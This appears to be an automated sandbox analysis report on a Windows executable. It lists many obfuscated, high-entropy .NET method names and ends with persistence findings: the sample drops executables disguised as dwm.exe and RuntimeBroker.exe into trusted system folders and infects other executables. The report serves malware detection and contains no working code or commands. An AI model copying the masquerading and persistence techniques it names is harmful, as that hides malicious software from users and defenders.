                              Source: jW5TA1J9Z1.exe, Pu045A9Fkr0nTIK74vn.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'NYv95PHbQh', 'asrFNsT60XoJw4cjhKyV', 'eGvd2WT6R4K7UAlwjpRF', 'Cgat6rT6lMTocCXHVmhH', 'pfgwiVT6P52OlioPLE7T', 'cdQihrT6Z2HFTa2ohSrQ', 'JX4Ed2T6IUsAmWptx9Le'
                              Source: jW5TA1J9Z1.exe, dWbdcX71E9ICGj8R4EX.csHigh entropy of concatenated method names: 'PPe7ZCVshp', 'HLY7IbBJHp', 'JMJ7m2XEMH', 'Ds2OegTj0cpqT62Amob3', 'Fq16JfTjRVCkEKcb35bG', 'veH7amroCl', 'esZ7jm329k', 'Kar7KbWafq', 'ASp7FZ4l9N', 'HJi7xbsS5s'
                              Source: jW5TA1J9Z1.exe, E2GFbM5NFsa1bwukhk9.csHigh entropy of concatenated method names: 'ER35eoVIOX', 'k6r', 'ueK', 'QH3', 'LvT59JrVub', 'Flush', 'vH15BVyxA2', 'Pv456YX2Dq', 'Write', 'f0u53MQqoe'
                              Source: jW5TA1J9Z1.exe, r9rjZMdrwI5CmDtQe7J.csHigh entropy of concatenated method names: 'N03d8AvMZw', 'P10hIgTf0T7Mp6nTnvbX', 'NTYKFSTfRTySf30tu2qO', 'AudwwYTflDQmtK2ya28P', 'tEEaAKTfPWw9GXwXutUF', 'bMJGfoTfwOaZ1rqJl4QG', 'irEBCQTfL595i6dCA9Am', 'aLC6BdTfZw5gS3VOym6Z'
                              Source: jW5TA1J9Z1.exe, t0quePgEsiE4fG3If60.csHigh entropy of concatenated method names: 'Pb3gjieG1O', 'TSNgKrmJ6W', 'IMlgFwPvZj', 'EDkgxgmWxt', 'pTpg5rOX8o', 'aSwgfMvI7o', 'S6AgMdBeip', 'O6AgwbvJsi', 'vYCgLCc0e0', 'MmNg0xW3tg'
                              Source: jW5TA1J9Z1.exe, wODRT1jl973r6IC2xbQ.csHigh entropy of concatenated method names: 'bVHjZ4gw5T', 'vl3jIgMgvZ', 'jshjmrECik', 'jxGjWKEbJ3', 'iMnjXRCuwq', 'YgFjV51s5Q', 'CO4jJVxcyb', 'JlMjNLnJuj', 'oxhj4y7L1f', 'sCkjeRXqxa'
                              Source: jW5TA1J9Z1.exe, dYvgDxHJYH11ev1NNYB.csHigh entropy of concatenated method names: 'MIMTdcFi7l0', 'uLgH4Qc4kN', 'KKGTdvo98Ed', 'QrhGJMTPOoy0ZnY2BcdJ', 'dQErFqTPsjNbw5CYL5Xt', 'zt5qO9TPrMQXHM7FavZu', 'nO1EXXTP8Mh1IXrSS7y1', 'fOELUoTPDlovIDc4lAYn', 'bAXYqCTPkq8x80G6HuBE', 'ycHLU3TP1bqtWL9JAOpH'
                              Source: jW5TA1J9Z1.exe, me45ZsFdaukWZWjRfIq.csHigh entropy of concatenated method names: 'IsWF2y5JTB', 'PqaFhkO8Gu', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'BjgFy1l4Zm', 'method_2', 'uc7'
                              Source: jW5TA1J9Z1.exe, me43ETpaelkPGN3sy0p.csHigh entropy of concatenated method names: 'dvIpwpFvYi', 'wHuN7aTRgkuVIqqpqTwO', 'NlQ6k8TR3QiGrT6Zq9or', 'kO7FBPTRUVT2xsLlxMh8', 'wS4UaYTRq02kqqFyGKiM', 'kirpKqK0mP', 'z2OpFswZED', 'DinpxFWHHM', 'rjelyyTRe2nDM1JJiadO', 'kgRK1QTR9ZTqNM47HiHI'
                              Source: jW5TA1J9Z1.exe, gqNFUx0FFEBABmDQuVX.csHigh entropy of concatenated method names: 'KpV05McBFF', 'dMj0fymqME', 'hNa0MVakIG', 'GLn0wb89Pb', 'mgs0L9YcZO', 'uBn00UpZG5', 'CY30RK6iaL', 'wQf0l0OXt0', 'lkG0PeM1mj', 'VJn0ZFeOxt'
                              Source: jW5TA1J9Z1.exe, roYepKae84k0J1NKxHL.csHigh entropy of concatenated method names: 'AFaaBOW5ut', 'wpha6oL8Sk', 'WLKa3KyLTG', 'N0iaUV9jtI', 'wbpagdFNhb', 'pvepeqTXPuOsarKwXEUx', 'sGCjBRTXRiFiX5yuPApZ', 'bReS4wTXlcOYpXDynpCr', 'hGZo4rTXZLv2UMybeqDY', 'aRcaN5TXIOseSZ1mo4pH'
                              Source: jW5TA1J9Z1.exe, nKj5r0TqNYwMw3jGIGp.csHigh entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'wcMTdTLWYmw', 'LFrTuTHIIlF', 'UdqhY7TiqWFQ1H8m4naR', 'ccBSV9TizSRWvr0SJBUD', 'eQvnnYTaSlmv9lG7wjXc', 'HaCuaTTaTbNcOLDI6wYr'
                              Source: jW5TA1J9Z1.exe, gNu9MRd2JKBgOVKGq5l.csHigh entropy of concatenated method names: 'oMSdyPTAvw', 'tXUdGU1VMT', 'jvMdC9KblI', 'sQi1YnTfrILHAMQoEQPw', 'tl0mpRTfHWEJea7ijwHb', 'PldyULTfsItM0pN4Un8H', 'axsfGdTfOWjLtr6bG3ZK', 'JPkel4Tf8RsuG5Xb0gCm', 'MuRn1BTfDJGLQcgltJpi'
                              Source: jW5TA1J9Z1.exe, tb89pw1FRgigHH5sUwk.csHigh entropy of concatenated method names: 'method_0', 'Sac15jgPXm', 'EC11f4nFbj', 'TKH1MUJhno', 'Okg1wbapvf', 'me51LKnQ4n', 'RWO10jxcIF', 'zPufc0TWErLSStAIekg5', 'VR46G7TWcaCOoeyXJp2R', 'a4BYCETWvI6ETF44mvDS'
                              Source: jW5TA1J9Z1.exe, BgFbYh7N5GevAUR0HUM.csHigh entropy of concatenated method names: 'mLpu7EyuMa', 'nZZuuVZZga', 'y0DutphIoh', 'zWIm2aTKSMdklytCvGwE', 'pLIlh1TKTQ3HnEg2pQog', 'MIoaY5TjqTyhvapBfj4o', 'LjZklVTjz6VnXXDmahZy', 'N5QuhcuAND', 'kJvIRLTKtLKDwMJstedl', 'BoRiaPTK7fSh3rdp8HJA'
                              Source: jW5TA1J9Z1.exe, CiiWXToC0QY5tPMRR3L.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'RfnftITMfsKqTe7rMT51', 'Hwaoq5TMMvUxqie0jafw', 'JFVXvWTMwOWV3gVOJAsx', 'y9eobJeTZJ'
                              Source: jW5TA1J9Z1.exe, qZPGdsHCbCQJMQAtLmI.csHigh entropy of concatenated method names: 'LDRHHJ4bhU', 'js4RbPTlNoCeDq44FTts', 'JQI8XNTl4qORmuI7Akro', 'GDQjOmTlVa5BZILvSpQJ', 'H0uRw8TlJWsUHALaYS6E', 'qXlxZmTlelnxEnfcXtqQ', 'DjJHbcglwI', 'TcsQ2lTlZ5UMSO2Tjmjb', 'LBX6xXTllXV5UFxyGe6E', 'hPfj6jTlPtPK9VR0oPyt'
                              Source: jW5TA1J9Z1.exe, MV9hBsdijxLds1B6cU9.csHigh entropy of concatenated method names: 'kYYdjrqKmQ', 'uW1dKFgO5J', 'odadFcxoOP', 'zWpdxckS5l', 'vO1d5Dh92R', 'E4NdfinMGP', 'Ib4ZbWTfNPe0s3LPX9WT', 'fL7pHHTf4KxohetlGiMP', 'pP7QnXTfeC1e1MWhtaTI', 'kLpQeXTf9qP8tXFxW6ai'
                              Source: jW5TA1J9Z1.exe, W0nISl9LcESKE9tQP48.csHigh entropy of concatenated method names: 'WCuTd1DRF3p', 'iviTYkf2K9a', 're7FSUT32px1j6DlkSSJ', 'Lx0xsgT3dr13AwW5CuIY', 'RrZRRwT3oOGMHYHEWNn2', 'Jgras6T3y1ZKnqTKImiL', 'R5hyP6T3GOkalAJy42Dj', 'imethod_0', 'iviTYkf2K9a', 'imethod_0'
                              Source: jW5TA1J9Z1.exe, dMV7YjuRZI0NPDvQhSI.csHigh entropy of concatenated method names: 'e7gugrBcbE', 'qu0L9pTFT4QLaZ134ZdI', 'yBwIjgTKzbNRtFy9WHlj', 'yvIoaVTFS3lINFxkSJWM', 'xgcrYhTFAKb2YoJN1qHA', 'psFMoZTFYe5PMR67tDIg', 'mHHmVLTFuPUSoBH0nF42', 'pwnpIdTFtYDy3mbKEkDo', 'EvomADTFQqd7OZZgCYXk', 'numtYTh0If'
                              Source: jW5TA1J9Z1.exe, kTScDkdtxNwfeLewqws.csHigh entropy of concatenated method names: 'O3I', 'P9X', 'Q7OTukJsSy4', 'vmethod_0', 'imethod_0', 'Hpv3fCTfceF57EmEd2pd', 'iD0Y1OTfnortMnIg9fBi', 'edBqAFTfb1YsFY7wktNL', 'hoyB49TfvKEukXDBbaEP', 'NrVkCHTfEgvUkjFyO6RW'
                              Source: jW5TA1J9Z1.exe, GkoJRNQPBX1qYfBebnL.csHigh entropy of concatenated method names: 'd6tQ6YsQZU', 'ukAQ308hNR', 'wg2mriTf2J444ZNnqAhT', 'C6JCsfTfdAPrtSHmXVGi', 'gfBwavTfothdYsoRbavb', 'mRIQIIQTWk', 'xNNQmOvxTT', 'i3gQWUPtEs', 'tuiQX6VBqo', 'v7HQVIUIYT'
                              Source: jW5TA1J9Z1.exe, zc2BOjsbCksnOUKTEmb.csHigh entropy of concatenated method names: 'rRM5c6TZnL2b70Lr7ctp', 'wnlO8MTZbNPHx8hXDtYc', 'YEQ53UTZcDo3OEc5FaBl', 'WSdRmtTZGPWfDKsnAPJE', 'mQZefmTZCUZr1DqJWwid', 'method_0', 'method_1', 'lRJsvYKlan', 'PvesEaRca8', 'QpCspKG5wQ'
                              Source: jW5TA1J9Z1.exe, g1kacJ6GfI9B0iDVtVb.csHigh entropy of concatenated method names: 'opC6bJFi3m', 'XYf6p317bX', 'NpX6r5dImn', 'CwO6ODRLS0', 'tJe684F7ss', 'zgZ6Dna70k', 'osO6ki4eT6', 'Wgd61y2PEY', 'Dispose', 'NYEAPmTUo6kJWbK4cSYR'
                              Source: jW5TA1J9Z1.exe, DOPg5ik95nWbWHCCQEp.csHigh entropy of concatenated method names: 'MHak6Pw8Do', 'qPBk3U4MZ9', 'mtYkUa5XH7', 'DwnnKKTWS7oWUrqkugx7', 'XT8DblTmqceaY5K9rh8Y', 'zeCLiYTmzs1ikqEa3Zom', 'yyOCFITWTvMB2WRFUQh7', 'uoKigCTWANEYu3UMnyCH', 'TyYy21TW7ernnB9gAyi4'
                              Source: jW5TA1J9Z1.exe, E8X18VnhK7jBdfmj755.csHigh entropy of concatenated method names: 'Dispose', 'b9SnG3ORHF', 'EIpnCJ4vxt', 'iORnnRvm0x', 'mL0tPVTL9rnG8ipGx1Xg', 'KMqTgXTLBanfKS98IP7m', 'gHrbqyTL6vOtHIKRaZf3', 'A7G2lLTL3u2ZtYKKu56f', 'Tsl2WbTLUPK1EX7WwVdZ'
                              Source: jW5TA1J9Z1.exe, rcYjC11hNIVo3hjU83n.csHigh entropy of concatenated method names: 'vua1GY0FmK', 'FSb1CYdByJ', 'cEs1nHQ1T0', 'BOZ1bsvXrX', 'lcx1c1ifVa', 'vNGOCXTWQnj0jb2vl5KP', 'ir84y5TWttKQomoaPY0G', 'WHxgP7TWY8GHimUsIaKV', 'm1kTA9TWd1RKt0c5Ynqx', 'F3vZGaTWowK9QPBLMp8o'
                              Source: jW5TA1J9Z1.exe, BbSCL5xsAvKhUNFrxpB.csHigh entropy of concatenated method names: 'sUX5CXNEi4', 'eD5310TNPMDFNsqsGlu5', 'HoFqrqTNRD8egQwsZYj9', 'PPvwrfTNl49pxSIHXnLo', 'S8RrDFTNZm66NUf1HLXf', 'kt5', 'Y0BxOGTQaL', 'ReadByte', 'get_CanRead', 'get_CanSeek'
                              Source: jW5TA1J9Z1.exe, LHVT6NtR1YGS1bttJvu.csHigh entropy of concatenated method names: 'q64', 'P9X', 'MxsTuCU9lNE', 'vmethod_0', 'gllTdY1iJbs', 'imethod_0', 'IdUllITFXrYtMxhJe38W', 'KmwKIJTFV8EZQ7vB8VYF', 'HUJ54VTFJ8LUrpUiZjTQ', 'h0Ekd9TFNvEuuHsvjKht'
                              Source: jW5TA1J9Z1.exe, mDq4N682XhD8gylFT2T.csHigh entropy of concatenated method names: 'XmF8FxNfE8', 'qU38yLFdt6', 'ErY8GaYMqC', 'whV8CkFmvW', 'TX08nqxSLU', 'FQZ8bDwREI', 'hQy8cZR49U', 'NWf8vPyfUp', 'ENp8EAWyDm', 'SXk8p5rSOR'
                              Source: jW5TA1J9Z1.exe, AoWg2si7arBEeFt2tIf.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'adyitt5sLD', 'Write', 'HxliYEocsm', 'ywWiQJEaIm', 'Flush', 'vl7'
                              Source: jW5TA1J9Z1.exe, Jfyc5bQwsF4W8WxsAqQ.csHigh entropy of concatenated method names: 'P9X', 'vmethod_0', 'KrUTu8MpNYA', 'AIxTdh28RV5', 'imethod_0', 'uT8O1dT5zCEkBZ1Dy6O6', 'DDQ3aLTfSO5ThMrtwl4w', 'WawwCTT5gO91tAU75WZb', 'E0bYskT5qBsngYIGLyYY', 'Qe8gTxTfT8Q0qr59xNUb'
                              Source: jW5TA1J9Z1.exe, wXYC0ftoaa3fTwp5sa9.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'fGOTdtvZKBx', 'LFrTuTHIIlF', 'Y4AdYJTFnAaZgyOdDuRB', 'T50uNVTFbOEuK1I8UDwR', 'cGZogGTFcC82SwdOa2xJ', 'hm9xRTTFvyVZtapMLEQ4'
                              Source: jW5TA1J9Z1.exe, kHhYM30mJyYQE2Q7gZk.csHigh entropy of concatenated method names: 'YUoTdDn2rOw', 'KWm0XG5TbD', 'fWZ0V4Pypq', 'STE0JS3l9e', 'cHydU8T9rcWwfMiBj9hW', 'mnaxcVT9OdflbRTHoMCN', 'REAGygT98bAhGcsJPf8h', 'XoEgqyT9DeoTRIsTabIW', 'J5pRuST9kS1cgfbIdh1o', 'OmTnv8T91VSlZgJ5wlye'
                              Source: jW5TA1J9Z1.exe, IHAsu4RFcj5F0xokNDo.csHigh entropy of concatenated method names: 'agnR53q68o', 'wEcRfJGycb', 'L2CRMrAr7N', 'uFARwwIdQg', 'a9xRLlTMyU', 'nSXR0AylRB', 'JPHRROhxnd', 'AJlRlT9pMu', 'fRVRP4ZTQZ', 'PrMRZZ3sZp'
                              Source: jW5TA1J9Z1.exe, nOpyJtzVB74PwpOeNH.csHigh entropy of concatenated method names: 'IioTTrRB89', 'EyIT7wgXDa', 'tArTuctQbx', 'SofTtAy4eB', 'vYKTYEQWTX', 'vTlTQiIGVO', 'wP7To9LsiJ', 'CATmqcTidNNqD863srDc', 'aUSF5gTiofB6qyIGprN3', 'PFEkVZTi2oBAbbuMAqxO'
                              Source: jW5TA1J9Z1.exe, XeymNVp0Ykqiw1d6nvS.csHigh entropy of concatenated method names: 'xxSpWFCtZ2', 'xHapXSso4w', 'uIKpVSXaKC', 'PEL2p5TlYqP4bgFTrkQG', 'f361cUTlQG24rainVTYP', 'IfN9YaTlupVn7gdigwdO', 'wJcbUkTltEb172qE8aw0', 'c9NplGwhiS', 'gM0pPdDCEm', 'kkjpZKX2uH'
                              Source: jW5TA1J9Z1.exe, RWl249nOqxmKbT4UDFS.csHigh entropy of concatenated method names: 'J2rpGEQ1KP', 'qWjpC6IlU1', 'RIsXDjTRfG6f7qm9PhqB', 'iTaniWTRxwxnpSA62CWS', 'DmMg0mTR5CgK1cx3RiTh', 'EnFMBGTRM2HA3bJ6sdyU', 'gpG1MtTRwDIRtob8Aa40', 'b70ppYqG1O', 'DXbmpqTRlM5nHnPGFxvG', 'XOCKpDTR0A0NtlJJPh4R'
                              Source: jW5TA1J9Z1.exe, Hr2fXBuxmUEbSMoh6Kn.csHigh entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'UlqTduDm1SB', 'LFrTuTHIIlF', 'tOye5BTKFeEWlfQrBcZZ', 'OVh9GLTKxh8GbjFhU9rA', 'GKkMu9TK5YsuGE8yoUTS', 'OlFGf2TKf60i8nLBnWuR', 'nApocfTKMS1dLB2xy5fl'
                              Source: jW5TA1J9Z1.exe, UCEkASAFdoopbJqY7fL.csHigh entropy of concatenated method names: 'MVrAP5Rsjd', 'pnaAZV0OGx', 'BY8LVhTaMiNYLM6c9PRb', 'uh1CoITa57ptBMs0cOoG', 'weoGQLTafRp9A3SAar6l', 'feZAXGvx3J', 'rPGjpcTaRN53ygjKK6sU', 's8UIWqTalJnjPvmIyVMm', 'bvyuAQTaLExc8pSgRVsS', 'ofaGGDTa0DsIUbyy4cmT'
                              Source: jW5TA1J9Z1.exe, BUN1OIYD0wR4MADS5ig.csHigh entropy of concatenated method names: 'sXqYFis5eU', 'BWjAPGTxwTAuUEOpfygt', 'QeNh1DTxfkIGN1BJ8fGi', 'tQwn1JTxMebFBYS6d13M', 'wHW9q8TxL6VODeimoeRw', 'USROdSTx0b72ArfIfwJL', 'E94', 'P9X', 'vmethod_0', 'mNyTuHFRWiZ'
                              Source: jW5TA1J9Z1.exe, de3jPwKq9ewGviGfDSg.csHigh entropy of concatenated method names: 'UY3FSQDfpC', 'jJaFTbMaP0', 'Yd7', 'vpZFAB08O9', 'yNNF7LGnrN', 'EyWFu7ES3F', 'HBMFtPsW2T', 'G5hYrPTJJNCI0aSSe0Do', 'HvnefbTJXZgm157xjrBn', 'iUReubTJVJAUDMkAKkbF'
                              Source: jW5TA1J9Z1.exe, WEHXvNH6ExbFLp69wVq.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'rDlHUP9Ekx', 'jYuTdEkBmCB', 'jPWwQ7TPK1R4xdJYFO8w', 'LYwvtKTPaLIZPfmaIsYF', 'eq217kTPjQkBbXWHcdhf', 'LMuheDTPFh3UkmDnj4UF', 'AspOL3TPxtEE83uSGZRM'
                              Source: jW5TA1J9Z1.exe, NDtbcKYPBmOXTZuIGb0.csHigh entropy of concatenated method names: 'vicY63s9Jv', 'SwQY38ebmv', 'hhVYUV62q0', 'E6M0ZxT57ngxRLquI5vL', 'xao4LeT5TSEivCMDfhTU', 'BxN0Q0T5ANyFrdElbEUs', 'oicYIsBw1t', 'H4WYmS4F71', 'MBGYWfXnK4', 'BB6YX5a6ON'
                              Source: jW5TA1J9Z1.exe, af8Sq0fNpDFcjKA909x.csHigh entropy of concatenated method names: 'uwfyCKTeSZRYaZ70fX5d', 'CiTSo2T4qGOalbmZTjGx', 'm72rUMT4z0nZVeoq5gBB', 'BqPqJ8TeTUMi77NIYyRT', 'NiOfenYkSW', 'Mh9', 'method_0', 'V5tf9pTvAT', 'hhBfBOaEdt', 'V4Ef6p5ISC'
                              Source: jW5TA1J9Z1.exe, VQ0ZLfR3pm7Nnsclewg.csHigh entropy of concatenated method names: 'aMCRggDaXR', 'KY5RqOlpV0', 'iWmRzDJI2U', 'fK4lSFvqQf', 'CcplTZUj9w', 'AJJlA6LeNo', 'cyCl7psHGn', 'feAlu0xiNE', 'pqmltfoCP8', 'vbWlYHabX4'
                              Source: jW5TA1J9Z1.exe, QN6waErGQMOc3Aq9yN0.csHigh entropy of concatenated method names: 'Ese8TpHy4Y', 'GOAjDqTIOl1lfQwWxPDo', 'g0WlcETIsNyE3977txlo', 'KINiKaTIr0MjqMVHJGeB', 'A4sebbTI8HmqJeIS1wYg', 'PPYrnUeVCV', 'c07rbYXkpi', 'QdUrcAxqf9', 'v3CrvDk7Ds', 'A97rEnCKWI'
                              Source: jW5TA1J9Z1.exe, S594Vs6FbcdiiOBshlP.csHigh entropy of concatenated method names: 'Wqe65INI97', 'Hcv6f5i94V', 'jBe6Mx844k', 'ol66wGGPFM', 'Dispose', 'vI1m2mTUbKCK8k4T5jSm', 'kptnh7TUcEDBieQ1BDJM', 'l7cuNCTUvjSjnFlik4XA', 'HLZgMtTUEbh45M3lc0SV', 'sbXV4aTUpm9FsXJ1MRsA'
                              Source: jW5TA1J9Z1.exe, hnlofVgRsl88MNBTeBw.csHigh entropy of concatenated method names: 'Q5PTYxcqOnM', 'Oq6TY5JQFl7', 'm1DTYf6lNY2', 'NIKTYMejMuy', 'MhtTYwrgfrF', 'zxDTYLcR8iv', 'hcLTY0uZbvg', 'AoLqtMX3Df', 'bUfTYReobPM', 'SYRTYlDGAjS'
                              Source: jW5TA1J9Z1.exe, jN9MC8AtVj3aQNeHaxb.csHigh entropy of concatenated method names: 'm3wAQ7iFsk', 'bYOAdaWaq8', 'GN4AoixdfZ', 'FUXA2Cm6Yc', 'UZrLRiTahWnXguOOIS6V', 'o0OdMiTayt6eBDhY9giQ', 'zYPRs8TaGrgTh646HGQg', 'lUavV5TaCnnLPtT35e3O', 'PjUNExTanGOXWejowZig', 'JYp2ljTabSqScu98dp8X'
                              Source: jW5TA1J9Z1.exe, Vxw1NZoAAQUN7kMUkkI.csHigh entropy of concatenated method names: 'vekouNweO0', 'N0xotmK6Fc', 'TpIoYj1DYU', 'AuNoQ9bMMy', 'TkkodOGnV8', 'YGvoouCHkZ', 'phAo2qmyRB', 'VKwoh973x9', 'LF4oy6WWnx', 'KTuoGdjtcK'
                              Source: jW5TA1J9Z1.exe, YPD4YqDIkP6h7GcQ7IK.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'pVNDWoTEJP', 'JB8DXWEr0r', 'Dispose', 'D31', 'wNK'
                              Source: jW5TA1J9Z1.exe, SJQpj6vbqidkX9IlkO.csHigh entropy of concatenated method names: 'fJBftLvd1', 'xk3D2tT1FPfG5QkZVXY3', 'pUMKDTT1xEvsguhQp4qp', 'LZqpJ2NeM', 'DomHAZUGf', 'KbBsxoRBI', 'iTyrYh6PZ', 'bcNO0Z2O7', 'b358K8ttH', 'gpnDrPoit'
                              Source: jW5TA1J9Z1.exe, TgeZ71lMvmhF7f29HsE.csHigh entropy of concatenated method names: 'QqdMMpTBJRA6uIJy1NMr', 'QVQZBmTBN5TIEBmavyFb', 'yaeeDQTBXEE4M1fpDG1X', 'QYJmwnTBVhgtLE5RRYtT', 'KTXGhSTBZhxXLD7F8gQH', 'FJCjs5TBIEn6hrUy4DZ7', 'SVMUIjTBmXIOiGq93sPD', 'J9rSuiTBlrAxbvo2iHRi', 's1Ioy5TBPmcY4JqjOoiy'
                              Source: jW5TA1J9Z1.exe, fxUWB0TEi8OJC8lD9ph.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'YC8TQzLNi2d', 'LFrTuTHIIlF', 'OqGU0ATiOBnGEVnIjoGw', 'd9Dx0nTi8tWJM5JhPiPi'
                              Source: jW5TA1J9Z1.exe, CqnYpX3ShIJ107LLy27.csHigh entropy of concatenated method names: 'YIK3unQqhk', 'zG63tKHDXI', 'EBgwElTUZO4xEms8p8e6', 'rWZrmMTUlm72dS0BUObm', 'LKDlolTUPtKUvjHHvrNO', 'aCLX9kTUIrCCthln8wpr', 'Q7lduwTUmRSPQsQuMryg', 'Nbn0AyTUW6IPFri0dxlK', 'xYZ3Ag7Z6n', 'ILsXsrTULlSmACL8b1IM'
                              Source: jW5TA1J9Z1.exe, UJ5mao84JmYOH6txoTP.csHigh entropy of concatenated method names: 'cJw89gJlGb', 'RG58Bk28L7', 'saQ86hEH5x', 'o5c830JZm6', 'wVN8U5BgpC', 'QunjJTTIVJ4IIFo5QwX7', 'lsBvwxTIWRlTqrd60rOp', 'PR1I18TIXDj94KsIDgDg', 'MiDyBKTIJG9PHcA7TviN', 'vph4t5TINXE8PXoQXI1C'
                              Source: jW5TA1J9Z1.exe, kUZF15sTv9HXX1C2LPd.csHigh entropy of concatenated method names: 'rC9', 'method_0', 'ecrTdpwU4tK', 'IhPTdH4pYT2', 'oQanBXTPMTJ9vqpnBQXG', 'EEiVphTPwVrdRw4UlOvc', 'ur88FbTPLWZOQRTj3yik', 'xHStANTP0CcfwZhFwJb1', 'V3R9qBTPRaqM7v3l6g3M', 'bymyWVTPlAiAm17rD43i'
                              Source: jW5TA1J9Z1.exe, XK4BAW0o890pA2FCtCM.csHigh entropy of concatenated method names: 'LM60DY9SuO', 'Ujci8CT9hsxMMWngJ44r', 'FQYH5sT9yeL89TwQQiHs', 'aTO5DlT9oEYQVYdjbPLe', 'euPXkrT92iFw3b1lQ4CN', 'h5oi8iT9GNLUHALMHOlk', 'IPy', 'method_0', 'method_1', 'method_2'
                              Source: jW5TA1J9Z1.exe, tyUGhZtbHq958ZvBekx.csHigh entropy of concatenated method names: 'x74ti7ePvB', 'SUTtatydgQ', 'q3FtjAxufg', 'qNlC43TFw4VSIoe0s1hT', 'sOhg5GTFfnq3L94dn4In', 'XCEGV9TFMDwsagfmf2um', 'd8t1rrTFLfNLMP1LYFLb', 'sW8t8G6oD3', 'Hj1tDc5Za1', 'Tm8FJhTFxIw7cHlfMc7d'
                              Source: jW5TA1J9Z1.exe, kHoCn4FUliBiQxx7IjR.csHigh entropy of concatenated method names: 'Y93FqJLi2E', 'rQmFzvApSJ', 'j72xSeSPqI', 'uWOxTVy9gS', 'jnpxAVJcJU', 'aZMx7OpRrP', 'Rpx', 'method_4', 'f6W', 'uL1'
                              Source: jW5TA1J9Z1.exe, EZlYGB3v2qc5R98kuh4.csHigh entropy of concatenated method names: 'qwifVsTg7IBvXCoVoLqf', 'GSqJvoTguiw991ctC9XF', 'J1XU9WbQpb', 'WqPVAvTgdbGcP8scp8Df', 'WnK9TqTgo2nyjRfgC8yD', 'KB6x4tTg2twC9CrTqSkG', 'v1WEWuTghnd0FhFcYVwH', 'lSjARKTgyJEiZfyit8SX', 'CtaQl5TgGDvKT4rteYC3', 'So9NArTgCQwejXiM5BUK'
                              Source: jW5TA1J9Z1.exe, FK9Lyjjd7e9tGhjx2iV.csHigh entropy of concatenated method names: 'Y25j2mDhEb', 'YYMjhbiVLH', 'CjSjy1hnD3', 'cfVsUFTXg8SCaweUPPSE', 'v93lCyTX33exwIPBevfL', 'Lv32NuTXUOyRBYjEpOEa', 'KIS6HmTXq33JjqExiDA4', 'a9KSlITXzyrvT0Qm0i92', 'zZZOUHTVSMFASdoHBaZg'
                              Source: jW5TA1J9Z1.exe, oeU2PqukIQ5YM1MemwR.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'oM2Td7IxF37', 'LFrTuTHIIlF', 'agCm5JTKO3SxusB9YXqG', 'CowdBXTK8AoUYIAuR7Y8', 'qQ0bCdTKDloFsJnmmVrb'
                              Source: jW5TA1J9Z1.exe, BxZFJkaWqnrgWh8iVm6.csHigh entropy of concatenated method names: 'LfVaVgocM9', 'LelaJQvqQN', 'ax4aN0SbB4', 'O2le0ITX5lHn9OxkEkuG', 'YD1YXHTXFWswECAq6Gkg', 'HUZCCmTXx08EUwNLcxj4', 'XbyHKoTXfsujtKuQ7fsx', 'zcEuDdTXMN7gJvenyb5I', 'BX16t8TXw70jPkvHgMXE', 'z2FpJXTXLYpgHbC5PV0f'
                              Source: jW5TA1J9Z1.exe, EFGVPAaqXZQvqt4nVoP.csHigh entropy of concatenated method names: 'mofjSdwy9f', 'WxHjTdY1SI', 'zI9jAbVGe2', 'OsCj7VHbnh', 'etajutuWbn', 'CN7jtcFfTk', 'V8NojxTXJhm22xvRdRnG', 'BONbcFTXX05xdTNocJDV', 'GWJSVOTXViuMajw6Xnfp', 'En1xC9TXNSndHjxFoCy4'
                              Source: jW5TA1J9Z1.exe, OxK16LQoI3H2Hs80wZo.csHigh entropy of concatenated method names: 'OpyQhLgFG0', 'rNFQyhRlss', 'JvbikdT5cE1xYDsVZc5F', 'Kt4eFVT5nGZ4nhyyiYLG', 'OBNZkDT5bwUpaUxSIK42', 'Wjdw2mT5vDIeikdvbiEG', 'd8onACT5ESB1gTXoUER8', 'c1IQAQT5pNKPVAeFkpcV', 'PvrmI5T5HeFYEVNIrhWK', 'Vci9pUT5sTtkw8145nyU'
                              Source: jW5TA1J9Z1.exe, BXUBq6T9AHTKr9Ucvrg.csHigh entropy of concatenated method names: 'P9X', 'fJKT6nnRsh', 'NbrTdS7gT2f', 'imethod_0', 'tosT3kb3xF', 'L9ZfceTi9E8jJ3kbXEcf', 'XFrV20TiBBM92jMexHQV', 'XRV4ChTi4fXlNcorYdZB', 'TmrrHVTiebOpFvjIsB9g', 'GxDTZfTi6GP7vSQDsf6g'
                              Source: jW5TA1J9Z1.exe, kmONbEwMvafZU9HlW4O.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Lxl48vTeihp5u2VmUiSS', 'HC1TIQTekA7wBlP6cNCm', 'l904RjTe1imH5AkvvU39'
                              Source: jW5TA1J9Z1.exe, l1hceWtIHSL5WeBekEg.csHigh entropy of concatenated method names: 'ASetJsw55m', 'vn3GGyTxTmCYGCtNOgER', 'xEo06ITFzacMpHPpuEWA', 'rGjmqcTxSLmnsRt5KypZ', 'npk0kjTxAyQbwwmM5WR7', 'fqbyWhTx7x2RPwxJk5AM', 'U1J', 'P9X', 'N4LTubdeuHV', 'EYeTucaGRkb'

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files with benign system names
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile created: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJump to dropped file
                              Drops executable to a common third party application directory
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile written: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJump to behavior
                              Drops executables to the windows directory (C:\Windows) and starts them
                              Source: unknownExecutable created and started: C:\Windows\DiagTrack\RuntimeBroker.exe
                              Infects executable files (exe, dll, sys, html)
